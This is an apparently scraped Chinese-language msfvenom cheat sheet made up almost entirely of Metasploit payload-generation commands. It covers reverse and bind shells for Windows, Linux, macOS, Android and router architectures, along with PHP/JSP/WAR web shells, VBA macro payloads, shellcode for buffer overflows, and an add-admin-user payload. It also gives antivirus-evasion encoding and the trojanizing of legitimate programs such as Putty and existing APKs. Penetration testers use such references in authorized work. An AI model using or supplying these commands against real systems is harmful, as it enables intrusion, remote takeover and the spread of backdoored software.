Msfvenom Cheatsheet
精选 70+ 条 Metasploit 框架下的 Payload 生成命令,涵盖各种平台、架构与高级绕过技巧。
基础查询 (Query)
列出所有可用 Payload
msfvenom -l payloads 列出所有编码器 (Encoders)
msfvenom -l encoders 列出所有支持的输出格式
msfvenom -l formats 列出所有支持的平台
msfvenom -l platforms 查看特定 Payload 的详细配置参数
msfvenom -p <payload> --list-options 查看完整帮助信息
msfvenom --help Windows 常用反弹壳
x86 Staged Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe x86 Stageless Meterpreter
msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe x64 Staged Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe x64 Stageless Meterpreter
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe HTTPS 加密通道 (绕过流量审计)
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f exe > https.exe x86 Staged CMD 反弹
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe x86 Stageless CMD 反弹
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe x64 Staged CMD 反弹
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe x64 Stageless CMD 反弹
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe 纯 PowerShell 反弹脚本
msfvenom -p windows/powershell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh > rev.ps1 使用 Shikata_ga_nai 编码 5 次
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe Linux 常用反弹壳
x86 Staged Meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf x86 Stageless Meterpreter
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf x64 Staged Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell64.elf x64 Stageless Meterpreter
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell64.elf x64 Staged Shell 反弹
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf x64 Stageless Shell 反弹
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf Bash 反弹 Shell (通用)
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh Python 反弹 Shell (Unix)
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py ARM64 (树莓派 4/移动设备)
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf ARMLE (树莓派/路由器)
msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf MIPSLE (路由器/嵌入式)
msfvenom -p linux/mipsle/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf MIPSBE (大端序路由器)
msfvenom -p linux/mipsbe/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf PowerPC (老旧服务器)
msfvenom -p linux/ppc/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf 脚本语言 / Web 壳
PHP Meterpreter (Web 上传)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php 原生 PHP 反弹 Shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > rev.php Java JSP 反弹 Shell (JSP 文件)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp Java JSP 反弹 Shell (WAR 包)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war Python 反弹 Meterpreter
msfvenom -p python/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.py Unix/Linux Python 反弹
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py Bash 反弹 Shell (Unix/Linux)
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh Windows PowerShell 反弹 BAT
msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<PORT> -f raw > rev.bat 免杀与高级技巧
去除坏字符 (如空字节)
msfvenom ... -b '\x00\xff' 指定退出方式 (thread/process/seh)
msfvenom ... EXITFUNC=thread Windows Bind TCP (目标监听)
msfvenom -p windows/shell/bind_tcp LHOST=<IP> LPORT=<PORT> -f exe > bind.exe Bind TCP Shellcode (BOF 用)
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf 绑定到现有可执行文件 (如 Putty)
msfvenom -p windows/meterpreter/reverse_tcp -x putty.exe -k -f exe > evil.exe 生成反射注入用的 DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > meter.dll 生成 Office 宏病毒 (VBA) 代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba 生成 C 语言格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c 生成 Python 格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f python 生成十六进制格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f hex 其他实用 Payload
Android APK 控端
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o app.apk Android 嵌入现有 APK
msfvenom -x template.apk -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o payload.apk macOS Staged Meterpreter
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho macOS Stageless Meterpreter
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho macOS Stageless Shell
msfvenom -p osx/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho Windows 添加管理员用户
msfvenom -p windows/adduser USER=admin PASS=123456 -f exe > adduser.exe 测试用的消息弹窗 Payload
msfvenom -p windows/messagebox TEXT="Hacked!" -f exe > msg.exe 未找到相关命令
试试搜索其他关键字,如 "windows" 或 "reverse"。